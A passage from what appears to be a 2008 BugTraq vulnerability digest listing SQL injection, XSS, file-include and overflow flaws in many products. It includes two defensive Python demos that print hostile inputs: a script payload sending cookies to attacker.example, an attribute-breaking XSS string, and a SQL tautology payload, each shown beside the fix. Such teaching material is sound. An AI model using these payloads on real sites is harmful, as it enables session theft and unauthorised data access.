Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

42. HP FTP Unspecified Remote Denial of Service Vulnerability
BugTraq ID: 29160
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29160
Summary:
FTP running on HP-UX is prone to a remote denial-of-service vulnerability.

Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.

43. Claroline Multiple Remote File Include Vulnerabilities
BugTraq ID: 29162
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29162
Summary:
Claroline is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow a remote attacker to compromise the application and the underlying system; other attacks are also possible.

Claroline 1.7.5 is affected; other versions may also be vulnerable.

44. Cisco User-Changeable Password (UCP) 'CSuserCGI.exe' Multiple Remote Vulnerabilities
BugTraq ID: 28222
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/28222
Summary:
Cisco User-Changeable Password (UCP) is prone to multiple remote vulnerabilities, including cross-site scripting and buffer-overflow vulnerabilities.

Exploiting the cross-site scripting issues may help the attacker steal cookie-based authentication credentials and launch other attacks. Exploiting the buffer-overflow vulnerabilities allows attackers to execute code in the context of the affected application, facilitating the remote compromise of affected computers.

The buffer-overflow issues are tracked by Cisco Bug ID CSCsl49180. The cross-site scripting issues are tracked by Cisco Bug ID CSCsl49205.

These issues affect versions prior to UCP 4.2 when running on Microsoft Windows.

45. BIGACE 'GLOBALS[_BIGACE][DIR]' Parameter Multiple Remote File Include Vulnerabilities
BugTraq ID: 29157
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29157
Summary:
BIGACE is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to include arbitrary remote PHP code and execute it in the context of the webserver process.

A successful exploit may lead to a compromise of the underlying system; other attacks are also possible.

BIGACE 2.4 is vulnerable; other versions may also be affected.

46. IBD Micro CMS 'microcms-admin-login.php' Multiple SQL Injection Vulnerabilities
BugTraq ID: 29159
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29159
Summary:
IBD Micro CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Micro CMS 3.5 is vulnerable; other versions may also be affected.

47. ClanLite SQL Injection and Cross-Site Scripting Vulnerabilities
BugTraq ID: 29156
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29156
Summary:
ClanLite is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ClanLite 2.0 is vulnerable; other versions may also be affected.

48. AJ Dating 'view_profile.php' SQL Injection Vulnerability
BugTraq ID: 29154
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29154
Summary:
AJ Dating is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

49. OpenSSL Montgomery Exponentiation Side-Channel Local Information Disclosure Vulnerability
BugTraq ID: 25163
Remote: No
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/25163
Summary:
OpenSSL is prone to a local information-disclosure vulnerability because of an implementation flaw in the RSA algorithm.

Successfully exploiting this issue allows local attackers to gain access to private key information of other processes that use the affected library. Information harvested may aid in further attacks.

OpenSSL 0.9.8 is vulnerable to this issue; other versions may also be affected.

50. OpenSSL DTLS Heap Buffer Overflow Vulnerability
BugTraq ID: 26055
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/26055
Summary:
OpenSSL is prone to a heap buffer-overflow vulnerability because the library fails to perform adequate boundary checks on user-supplied data.

Successfully exploiting this issue may allow attackers to execute arbitrary machine code in the context of applications that use the affected library, but this has not been confirmed. Failed exploit attempts may crash applications, denying service to legitimate users.

51. CyrixMED 'index.php' Cross Site Scripting Vulnerability
BugTraq ID: 29153
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29153
Summary:
CyrixMED is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

CyrixMED 1.4 is vulnerable; other versions may also be affected.

52. Linux Kernel 'fcntl_setlk()' SMP Ordering Local Denial of Service Vulnerability
BugTraq ID: 29076
Remote: No
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29076
Summary:
The Linux kernel is prone to a local denial-of-service vulnerability.

Attackers can exploit this issue to trigger kernel crashes, denying service to legitimate users.

Versions prior to Linux kernel 2.6.25.2 and 2.4.36.4 are vulnerable.

53. T1lib intT1_Env_GetCompletePath Buffer Overflow Vulnerability
BugTraq ID: 25079
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/25079
Summary:
T1lib is prone to a buffer-overflow vulnerability because the library fails to perform boundary checks before copying user-supplied data to insufficiently sized memory buffers.

An attacker can exploit this issue to execute arbitrary machine code in the context of applications that use the affected library. Failed exploit attempts will likely trigger crashes, denying service to legitimate users.

We do not know which versions of T1lib are affected.

54. teTeX Mkind.C Remote Buffer Overflow Vulnerability
BugTraq ID: 23872
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/23872
Summary:
teTeX is prone to a buffer-overflow vulnerability because it fails to sufficiently perform boundary checks on user-supplied input before copying it to an insufficiently sized memory buffer.

Remote attackers may exploit this issue by enticing victims into opening a malicious file using the affected application.

Attackers can exploit this issue to execute arbitrary code with the privileges of an unsuspecting user. A successful attack can facilitate the compromise of vulnerable computers. Failed exploit attempts will likely result in denial-of-service conditions.

This issue affects teTeX 2.0.2 and 3.0.0; other versions may also be vulnerable.

55. teTeX DVI File Parsing Multiple Vulnerabilities
BugTraq ID: 26469
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/26469
Summary:
teTeX is prone to multiple vulnerabilities that include buffer-overflow errors and race-condition issues.

Attackers can exploit these issues to execute arbitrary code in the context of the affected application, cause denial-of-service conditions, or obtain potentially sensitive information.

56. GD Graphics Library Multiple Vulnerabilities
BugTraq ID: 24651
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/24651
Summary:
The GD graphics library is prone to multiple vulnerabilities.

An attacker can exploit this issue to cause denial-of-service conditions or execute arbitrary code in the context of applications implementing the affected library.

Versions prior to GD graphics library 2.0.35 are reported vulnerable.

57. Xpdf Multiple Remote Stream.CC Vulnerabilities
BugTraq ID: 26367
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/26367
Summary:
Xpdf is prone to multiple remote vulnerabilities because of flaws in various functions in the 'Stream.cc' source file.

Attackers exploit these issues by coercing users to view specially crafted PDF files with the affected application.

Successfully exploiting these issues allows attackers to execute arbitrary machine code in the context of the vulnerable application. This facilitates the remote compromise of affected computers.

Xpdf 3.02pl1 is vulnerable to these issues; other versions may also be affected.

58. KDE KPDF/KWord/XPDF StreamPredictor Function Stack Buffer Overflow Vulnerability
BugTraq ID: 25124
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/25124
Summary:
KDE kpdf, kword, and xpdf are prone to a stack-based buffer-overflow vulnerability because the applications fail to bounds-check user-supplied data before copying it into an insufficiently sized buffer.

An attacker can exploit this issue to execute arbitrary code within the context of the affected application or cause the affected application to crash, denying service to legitimate users.

59. GD Graphics Library PNG File Processing Denial of Service Vulnerability
BugTraq ID: 24089
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/24089
Summary:
The GD graphics library is prone to a denial-of-service vulnerability.

An attacker can exploit this issue to cause denial-of-service conditions in applications implementing the affected library.

GD graphics library 2.0.34 is reported vulnerable; other versions may be affected as well.

60. PCRE Regular Expression Library UTF-8 Options Multiple Remote Denial of Service Vulnerabilities
BugTraq ID: 26550
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/26550
Summary:
The PCRE regular-expression library is prone to multiple remote denial-of-service vulnerabilities because a memory-calculation error occurs for certain regular expressions.

Successful exploits may allow remote attackers to cause denial-of-service conditions on computers running the affected library.

These issues affect versions prior to PCRE 7.0.

61. Meto Forum 'forum/kategori.asp' SQL Injection Vulnerability
BugTraq ID: 29189
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29189
Summary:
Meto Forum is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Meto Forum 1.1 is vulnerable; other versions may also be affected.

62. WGCC Web Group Communication Center Cross-Site Scripting and SQL Injection Vulnerabilities
BugTraq ID: 29188
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29188
Summary:
WGCC (Web Group Communication Center) is prone to multiple input-validation vulnerabilities, including a cross-site scripting issue and multiple SQL-injection issues, because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

WGCC 1.0.3 is vulnerable; other versions may also be affected.

63. Build A Niche Store 'q' Parameter Cross-Site Scripting Vulnerability
BugTraq ID: 29187
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29187
Summary:
Build A Niche Store is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Build A Niche Store version 3.0 is vulnerable to this issue; other versions may also be affected.

64. Xen Para-Virtualized Framebuffer Message Format Denial Of Service Vulnerability
BugTraq ID: 29186
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29186
Summary:
Xen is prone to a denial-of-service vulnerability because the application fails to adequately verify the format of user-supplied data.

An attacker can leverage this issue to cause denial-of-service conditions, or compromise the privileged domain (dom0).

65. Zogo-shop 'products.php' SQL Injection Vulnerability
BugTraq ID: 29185
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29185
Summary:
Zogo-shop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Zogo-shop 1.16 Beta 13 is vulnerable; other versions may also be affected.

66. EQdkp 'user_id' Parameter SQL Injection Vulnerability
BugTraq ID: 29184
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29184
Summary:
EQdkp is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

EQdkp 1.3.2f is vulnerable; other versions may also be affected.

67. Xen Para Virtualized Frame Buffer Backend Local Denial of Service Vulnerability
BugTraq ID: 29183
Remote: No
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29183
Summary:
Xen is prone to a local denial-of-service vulnerability.

Successfully exploiting this issue will crash the affected application, denying service to legitimate users. Due to the nature of this issue, arbitrary code execution may be possible; however, this has not been confirmed.

68. TYPO3 WT Gallery Extension Multiple Input Validation Vulnerabilities
BugTraq ID: 29182
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29182
Summary:
The WT Gallery extension for TYPO3 is prone to a cross-site scripting vulnerability and multiple information-disclosure vulnerabilities because it fails to properly verify user-supplied input.

An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

WT Gallery (wt_gallery) 2.6.2 and prior are affected by the cross-site scripting issue. WT Gallery (wt_gallery) 2.5.0 and prior are affected by the information-disclosure issues.

69. e107 BLOG Engine 'comment.php' SQL Injection Vulnerability
BugTraq ID: 29181
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29181
Summary:
e107 BLOG Engine is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

e107 BLOG Engine 2.2 is vulnerable; other versions may also be affected.

70. TYPO3 Event Database Extension Unspecified Cross Site Scripting Vulnerability
BugTraq ID: 29180
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29180
Summary:
The Event Database extension for TYPO3 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Event Database (rlmp_eventdb) versions prior to 1.1.2 are vulnerable.

71. ActualScripts ActualAnalyzer 'view.php' Cross-Site Scripting Vulnerability
BugTraq ID: 29177
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29177
Summary:
ActualAnalyzer is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Reports indicate that the following versions are affected:

ActualAnalyzer Server 8.37
ActualAnalyzer Gold 7.74
ActualAnalyzer Pro 6.95
ActualAnalyzer Lite 2.78

72. PCRE Regular Expression Library Multiple Integer and Buffer Overflow Vulnerabilities
BugTraq ID: 26462
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/26462
Summary:
The PCRE regular-expression library is prone to multiple integer- and buffer-overflow vulnerabilities.

Attackers can exploit these issues to execute arbitrary code, cause denial-of-service conditions, or launch other attacks in the context of the application using the affected library.

73. PCRE Regular Expression Library Multiple Security Vulnerabilities
BugTraq ID: 26346
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/26346
Summary:
The PCRE regular-expression library is prone to multiple security vulnerabilities.

Attackers can exploit these issues to execute arbitrary code, cause denial-of-service conditions, or launch other attacks in the context of the application using the affected library.

74. Apache HTTP Server 403 Error Cross-Site Scripting Vulnerability
BugTraq ID: 29112
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29112
Summary:
Apache HTTP server is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

UPDATE: Additional reports indicate that the default error page has the Content-Type set, rendering it not vulnerable.

NOTE: Reportedly, Microsoft Internet Explorer fails to properly follow RFC-2616 and uses content-sniffing to interpret UTF-7 data received in HTTP responses. After further analysis, we may rewrite this BID to be Internet Explorer-specific.

75. ZeusCart 'category_list.php' SQL Injection Vulnerability
BugTraq ID: 29155
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29155
Summary:
ZeusCart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ZeusCart 2.0 is vulnerable; other versions may also be affected.

76. phpInstantGallery Multiple Cross-Site Scripting Vulnerabilities
BugTraq ID: 29152
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29152
Summary:
phpInstantGallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

77. Joomla! and Mambo xsstream-dm Component 'movie' Parameter SQL Injection Vulnerability
BugTraq ID: 29144
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29144
Summary:
The xsstream-dm component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

This issue affects xsstream-dm 0.01 Beta.

78. AJ Classifieds 'index.php' SQL Injection Vulnerability
BugTraq ID: 29151
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29151
Summary:
AJ Classifieds is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

The issue affects AJ Classifieds 2008; other versions may also be vulnerable.

79. AJ Auction 'classifide_ad.php' SQL Injection Vulnerability
BugTraq ID: 29150
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29150
Summary:
AJ Auction is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

The issue affects AJ Auction 6.2.1 and prior versions.

80. AJ Article 'featured_article.php' SQL Injection Vulnerability
BugTraq ID: 29149
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29149
Summary:
AJ Article is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

The issue affects AJ Article 1.0; other versions may also be vulnerable.

81. Blender 'radiance_hdr.c' Remote Buffer Overflow Vulnerability
BugTraq ID: 28870
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28870
Summary:
Blender is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

The issue affects Blender 2.45; other versions may also be affected.

82. Blender Unspecified Insecure Temporary File Creation Vulnerability
BugTraq ID: 28936
Remote: No
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28936
Summary:
Blender creates temporary files in an insecure manner.

An attacker with local access could potentially exploit this issue to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application.

Successfully mounting a symlink attack may allow the attacker to delete or corrupt sensitive files, which may result in a denial of service. Other attacks may also be possible.

83. WordPress WP Photo Album Plugin 'photo' Parameter SQL Injection Vulnerability
BugTraq ID: 29148
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29148
Summary:
The WordPress WP Photo Album (WPPA) plugin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

84. Vortex CMS 'index.php' SQL Injection Vulnerability
BugTraq ID: 29146
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29146
Summary:
Vortex CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

85. QuickUpCMS Multiple SQL Injection Vulnerabilities
BugTraq ID: 29145
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29145
Summary:
QuickUpCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

86. PhpBlock Multiple Remote File Include Vulnerabilities
BugTraq ID: 29143
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29143
Summary:
PhpBlock is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow a remote attacker to compromise the application and the underlying system; other attacks are also possible.

PhpBlock a8.5 is affected; other versions may also be vulnerable.

87. OtherLogic 'vocourse.php' SQL Injection Vulnerability
BugTraq ID: 29139
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29139
Summary:
OtherLogic is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

88. Advanced Links Management 'read.php' SQL Injection Vulnerability
BugTraq ID: 29137
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29137
Summary:
Advanced Links Management is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Advanced Links Management 1.5.2 is vulnerable; other versions may also be affected.

89. SARG Multiple Unspecified Buffer Overflow Vulnerabilities
BugTraq ID: 29141
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29141
Summary:
SARG is prone to multiple buffer-overflow vulnerabilities.

A remote attacker can exploit these issues to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely result in denial-of-service conditions.

90. Joomla! and Mambo Datsogallery Component 'sub_votepic.php' SQL Injection Vulnerability
BugTraq ID: 29138
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29138
Summary:
The Datsogallery component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Datsogallery 1.6 is vulnerable; other versions may also be affected.

91. Linux Kernel 'sys_utimensat' Local Denial of Service Vulnerability
BugTraq ID: 29134
Remote: No
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29134
Summary:
The Linux kernel is prone to a local denial-of-service vulnerability.

Attackers can exploit this issue to cause the kernel to crash, denying service to legitimate users.

This issue affects Linux kernel versions 2.6.22 through 2.6.25.2.

92. BlogPHP Multiple HTML Injection, Cross-Site Scripting and Cookie Manipulation Vulnerabilities
BugTraq ID: 29133
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29133
Summary:
BlogPHP is prone to multiple input-validation vulnerabilities, including a cross-site scripting issue, an HTML-injection issue, and a cookie-manipulation issue.

Attackers can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials from legitimate users, modify the way the site is rendered, and, through the cookie-manipulation issue, gain access as an arbitrary user and compromise the application. Other attacks are also possible.

BlogPHP 2.0 is vulnerable; other versions may also be affected.

93. Phoenix View CMS 'admin_frame.php' Cross-Site Scripting Vulnerability
BugTraq ID: 29130
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29130
Summary:
Phoenix View CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Phoenix View CMS Pre Alpha2 is vulnerable; other versions may also be affected.
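
The BlogPHP and Phoenix View CMS entries above describe the same root cause: request data is written into the page without encoding for the HTML context it lands in. The following is an added example, not code from either product or from the advisories. The render functions, the `data-author` attribute and the two payload strings are constructed for illustration; the cookie header shows the server-side control that limits what injected script can reach.

```python
import html

# Constructed attacker inputs standing in for a blog comment body and an author
# field; these are not payloads taken from the BlogPHP or Phoenix View CMS advisories.
PAYLOAD_TEXT = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'
PAYLOAD_ATTR = '" onmouseover="alert(document.cookie)'


def render_vulnerable(author, comment):
    """The advisory pattern: untrusted strings are concatenated straight into
    the HTML, both inside an attribute value and inside an element body."""
    return '<div class="comment" data-author="%s">%s</div>' % (author, comment)


def render_hardened(author, comment):
    """Encode for the HTML context at the point of output. quote=True also
    escapes the quote characters, which is what stops PAYLOAD_ATTR from closing
    the attribute and appending an event handler."""
    return '<div class="comment" data-author="%s">%s</div>' % (
        html.escape(author, quote=True),
        html.escape(comment, quote=True),
    )


def session_cookie_header(session_id):
    """Limit the damage of any XSS that slips through: HttpOnly keeps the token
    out of document.cookie, Secure keeps it off plaintext HTTP. This does not
    replace output encoding; injected script can still act as the logged-in user."""
    return "Set-Cookie: PHPSESSID=%s; Path=/; HttpOnly; Secure" % session_id


def demo():
    """Render the same attacker input both ways so the difference is visible."""
    return {
        "vulnerable": render_vulnerable(PAYLOAD_ATTR, PAYLOAD_TEXT),
        "hardened": render_hardened(PAYLOAD_ATTR, PAYLOAD_TEXT),
        "cookie": session_cookie_header("deadbeef"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print("%-10s %s" % (name, value))
```

In the vulnerable output the author field closes the `data-author` attribute and adds an `onmouseover` handler, and the comment body arrives as a live `<script>` element; in the hardened output both survive only as text. Escaping has to match the context (an attribute, a text node, a JavaScript string or a URL each need different treatment), so the `html.escape` call here is correct for these two slots and not a general-purpose filter.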

94. Ktools PhotoStore Multiple SQL Injection Vulnerabilities
BugTraq ID: 29136
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29136
Summary:
PhotoStore is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

95. Ktools PhotoStore 'gallery.php' SQL Injection Vulnerability
BugTraq ID: 29132
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29132
Summary:
PhotoStore is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PhotoStore 3.4.3 is vulnerable; other versions may also be affected.
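
Entries 87, 88, 90, 94 and 95 all describe the same defect: a request parameter is concatenated into an SQL statement. The block below is an added example of that pattern and its fix, not code from OtherLogic, Advanced Links Management, Datsogallery or PhotoStore, and the `photos` table, its rows and the payload are constructed for the demonstration. SQLite is used so it runs offline; the same string-versus-bound-parameter distinction applies to MySQL, which these PHP applications typically use.

```python
import sqlite3

# Constructed sample data standing in for an application's photo or links table;
# this is not the real schema of any product named in the advisories above.
SAMPLE_ROWS = [
    (1, "sunset", 1),
    (2, "harbour", 1),
    (3, "draft-private", 0),
]


def make_db():
    """Build an in-memory SQLite database with one table of public/private photos."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE photos (id INTEGER, title TEXT, public INTEGER)")
    conn.executemany("INSERT INTO photos VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, photo_id):
    """The advisory pattern: the request parameter is pasted into the SQL text,
    so a quote in it ends the literal and whatever follows is parsed as SQL."""
    sql = "SELECT id, title FROM photos WHERE public = 1 AND id = '%s'" % photo_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, photo_id):
    """The fix: the value is bound separately from the statement, so it is only
    ever compared as data and cannot change the structure of the query."""
    sql = "SELECT id, title FROM photos WHERE public = 1 AND id = ?"
    return conn.execute(sql, (photo_id,)).fetchall()


# A tautology payload: closes the quoted literal, then ORs in a condition that
# is always true. Because AND binds tighter than OR, the 'public = 1' restriction
# no longer applies, and the private row is returned too.
PAYLOAD = "1' OR '1'='1"


def demo():
    """Run a normal lookup and the payload through both query styles."""
    conn = make_db()
    return {
        "vulnerable_normal": lookup_vulnerable(conn, 1),
        "vulnerable_payload": lookup_vulnerable(conn, PAYLOAD),
        "parameterized_normal": lookup_parameterized(conn, 1),
        "parameterized_payload": lookup_parameterized(conn, PAYLOAD),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print("%-22s %s" % (name, rows))
```

With the bound parameter the payload is compared as a single string against an integer column and matches nothing; with string formatting the same bytes become part of the WHERE clause and expose the row the `public = 1` filter was meant to hide. Escaping functions such as `mysql_real_escape_string` are a weaker substitute because they depend on the connection's character set and on the developer remembering every call site.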

96. txtCMS 'index.php' Local File Include Vulnerability
BugTraq ID: 29131
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29131
Summary:
txtCMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.

txtCMS 0.3 is vulnerable; other versions may also be affected.

97. Admidio 'get_file.php' Local File Include Vulnerability
BugTraq ID: 29127
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29127
Summary:
Admidio is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.

Admidio 1.4.8 is vulnerable; other versions may also be affected.
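
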